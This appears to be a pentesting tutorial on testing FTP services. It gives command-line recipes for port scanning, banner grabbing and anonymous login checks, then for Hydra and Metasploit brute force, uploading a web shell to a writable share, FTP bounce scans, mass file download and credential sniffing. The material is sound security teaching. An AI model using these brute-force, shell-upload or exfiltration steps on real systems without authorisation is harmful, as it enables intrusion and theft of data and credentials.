Pentesting FTP

FTP 21 Icon
FTP (File Transfer Protocol) is a standard network protocol used to transfer files between a client and a server over a TCP/IP network. FTP is widely used for transferring files between systems, especially in older networks and legacy systems. This prevalence makes it a common target for attackers, and thus, a crucial area for pentesters to evaluate. FTP, by design, lacks encryption, meaning credentials and data are transmitted in plaintext and it is often misconfigured.

Discovery and Enumeration

Several tools and techniques exist to discover FTP across a network or a specific device, such as a web application server. The commands and tools below identify whether port 21 is open and an FTP service is running. It is also essential to obtain the FTP service banner, as this will help you find publicly available exploits for the specific product or version of FTP.

##Nmap
sudo nmap -p 21 10.1.1.1          #Simple Nmap command to scan a specific target for open port 21
sudo nmap -p 21 -sV 10.1.1.1      #A a more detailed scan that also tries to determine the service and version running
sudo nmap -p 21 10.1.1.0/24       #Scan a subnet for open FTP ports
sudo nmap -p 21 -iL targets.txt   #Scan a file of IPs for open FTP ports

##Netexec
nxc ftp 10.1.1.1                  #Scan a single host for FTP services enabled on a host
nxc ftp 10.1.1.0/24               #Scan a subnet for FTP services enabled

##Powershell
Test-NetConnection -ComputerName 10.1.1.1 -Port 21    #Powershell Test-NetConnection cmdlet to scan a host for open FTP port
1..255 | %{ $ip="10.1.1.$_"; if (Test-NetConnection -ComputerName $ip -Port 21 -WarningAction SilentlyContinue).TcpTestSucceeded { "$ip : Port 21 open" } else { "$ip : Port 21 closed" } }    #Powershell Test-NetConnection cmdlet to scan a subnet for open FTP port

##Metasploit
msf > use auxiliary/scanner/ftp/ftp_version
set RHOSTS 10.1.1.0/24
set THREADS 50
run                                           #Scans a range of IP addresses and determines the version of any FTP servers that are running

##Masscan
masscan -p21 10.1.1.1                         #Scan a single host for open FTP
masscan -p21 10.1.1.0/24                      #Scan a network subnet for open FTP ports
masscan -p21 10.1.1.0/24 --banners            #Scan a network subnet for open FTP ports and retrieve banners

##Netcat (nc)
nc 10.1.1.1 21       #Test if port 21 is open on a target

##Telnet
telnet 10.1.1.1 21   #Test if port 21 is open on a target

Nmap Scan

Use nmap to enumerate FTP services:

nmap -p 21 --script ftp* 10.1.1.1

This will check for anonymous login, FTP bounce attacks, and other vulnerabilities. You can also perform a more aggressive scan with version detection:

nmap -p 21 -sV -A 10.1.1.1

Perform an unauthenticated scan for additional enumeration:

sudo nmap -sV -p21 -sC -A 10.1.1.1

Banner Grabbing

Identify the FTP server version:

echo "QUIT" | nc -nv 10.1.1.1 21
nmap -p 21 --script banner 10.1.1.1

You can try using the HELP and FEAT commands to obtain more information:

HELP
FEAT

Directory Enumeration

Check for readable directories:

ls -la

Test if the account has write permissions:

mkdir test

Anonymous Access

Check if anonymous login is enabled:

ftp 10.1.1.1
Name: anonymous
Password: anonymous

If successful, you can list all files with:

ls -la

You can download a file with:

get <file>

Exploitation

Finding Public Exploits

In this phase, you will have identified open port 21 and confirmed that an FTP service is running on it (Remember, FTP can run on non-standard ports—a popular one is 2121). You will also have performed banner grabbing using the tools and commands above. If the FTP service is misconfigured with banner disclosure, you can check for publicly available exploits for the specific version.

##Searchsploit
searchsploit FTP                    #Returns all exploit titles containing FTP including the exploit ID
searchsploit vsftpd 2.3.4           #Returns specific exploit titles for the service name and version including the exploit ID
searchsploit 17491 -examine         #Returns details for the exploit ID obtained above

All FTP-related exploits found in the Exploit Database can be listed using the following: https://www.exploit-db.com/search?q=FTP

Nmap scripts can be used to test for common FTP issues and vulnerabilities:

sudo nmap -sTCV --script ftp-* -Pn -p 21 10.1.1.1              #Run all FTP nmap scripts agains the target
sudo nmap -sTCV –-script=ftp-anon,tftp-enum -p 21 10.1.1.1     #Running specific FTP Nmap scripts against the target (Anonymous login checks and user enumeration)

 

FTP Brute Force

The FTP service protocol is susceptible to brute-force attacks. You can attempt a brute-force attack against the identified usernames from the above techniques or use a list of username:password combinations. A good FTP username and password list can be found here:

Metasploit can perform an FTP login sweep using the following. I modified the ftp-betterdafaultpasslist so that a space separates the usernames and passwords and not : which is required for Metasploit. There are other options to brute force a single username if you have identified any valid ones.

##Metasploit
sudo msfconsole -q
use auxiliary/scanner/ftp/ftp_login
set ANONYMOUS_LOGIN true
set BLANK_PASSWORDS true
set USER_AS_PASS true
set USERPASS_FILE ftp_bruteforce.txt
set RHOSTS 10.1.1.1
exploit

Hydra is a popular tool for brute-forcing several protocols, including FTP. It can be found here: https://github.com/vanhauser-thc/thc-hydra

##Hydra
hydra -l 'anonymous' -p 'anonymous' ftp://10.1.1.1                                                   #Test for anonymous login on the target FTP server.
hydra -l <username> -P /path/to/passwords.txt 10.1.1.1 ftp                                           #Brute force FTP with a single username and a list of passwords
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt 10.1.1.1 ftp                               #Brute force FTP with a list of usernames with all passwords in a list of passwords
hydra -C ~/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.1.1.1       #Brute force FTP username and password combo list against the target FTP server
hydra -C ~/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 10.1.1.1 ftp         #Brute force FTP username and password combo against the target FTP server

Exploiting Misconfigurations

If write permissions are enabled, you can upload a file:

ftp 10.1.1.1
put shell.php

If the FTP server is tied to a web server, you can attempt to execute the uploaded file with the following:

http://10.1.1.1/shell.php

FTP Bounce Attack

Some FTP servers allow port scanning through FTP bounce attacks. You can use this to port scan the internal network or mask your scans:

nmap -Pn -v -p 21 -b anonymous:[email protected] 10.2.2.2

Downloading All Files from FTP

Download all FTP files recursively:

wget -m ftp://anonymous:[email protected]
wget -r --user="USERNAME" --password="PASSWORD" ftp://10.1.1.1/   #If the username/password has special characters

Credential Capture

FTP does not encrypt its data and control connections. The user name and password are transmitted in clear text and may be intercepted by a network sniffer or a man-in-the-middle attack. If you have compromised a host on the network or have access to the network and can create a man-in-the-middle setup, you can use a tool like WireShark to sniff traffic and collect credentials for FTP.

Capturing network traffic and filtering for the FTP protocol will allow you to follow the TCP stream and view the credentials used to connect to the destination IP.

FTP Clear Text Credentials